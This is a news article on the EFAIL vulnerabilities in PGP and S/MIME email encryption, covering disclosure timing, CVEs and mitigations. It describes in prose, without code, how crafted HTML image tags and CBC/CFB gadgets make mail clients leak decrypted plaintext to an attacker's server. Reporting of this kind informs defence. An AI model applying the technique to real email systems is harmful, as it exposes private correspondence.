Critical unpatched vulnerabilities in widely-used email encryption tools PGP and S/MIME have been discovered by a team led by Sebastian Schinzel, professor of Computer Security at the Münster University of Applied Sciences. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The EFF’s report only indicated that a vulnerability existed, and that users should disable PGP plugins in their mail clients until patches are deployed.
The researchers intended to hold off on full publication until Tuesday, May 15, though the white paper was published earlier due to the embargo being broken.
According to a tweet from Schinzel, the vulnerabilities «might reveal the plaintext of encrypted emails, including encrypted emails sent in the past.» He later added that «There are currently no reliable fixes for the vulnerability.»
S/MIME is relatively commonplace in enterprise email networks, making this vulnerability particularly concerning.
SEE: Encryption policy (Tech Pro Research)
There are two different types of attacks included in EFAIL. The first is a «direct exfiltration» attack that relies on clients such as Apple Mail, iOS Mail, and Mozilla Thunderbird rendering encrypted email as HTML. This attack relies on a three-part message being sent. The first opens an image tag, the second email constitutes the message body, while the third closes the image tag. Because the HTML rendering engine is enabled, this prompts the mail client to treat the message body as a URL, which it encodes and queries the malicious actor’s server, thereby leaking the message.
The second vulnerability partially incorporates the first, and relies on an attacker being able to guess parts of the encrypted communication, which is generally possible due to the nature of the protocol involved. Because a full block of plaintext—the researchers cite S/MIME emails starting with «Content-type: multipart/signed» as one—is known to the attacker, this allows the attacker to «repeatedly [append] CBC gadgets to inject an image tag into the encrypted plaintext. This creates a single encrypted body part that exfiltrates its own plaintext when the user opens the attacker email.»
The researchers note that S/MIME uses Cipher Block Chaining, while OpenPGP uses Cipher Feedback, both of which are exploitable in similar ways. The pair are published as CVE-2017-17688 and CVE-2017-17689.
Although no fix is presently available, the researchers advise that email decryption take place in a separate program, as well as disabling HTML rendering from your email client as a mitigation step. That said, the researchers indicate that, long term, updates to the OpenPGP and S/MIME standards are necessary to fully address the issue. The developer of NeoPG noted on Twitter that «The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress.»
The big takeaways for tech leaders:
- The EFAIL vulnerabilities, which currently have no software patch, «might reveal the plaintext of encrypted emails, including encrypted emails sent in the past,» according to researchers.
- The researchers indicate that updates are needed for OpenPGP and S/MIME to fully address the issue.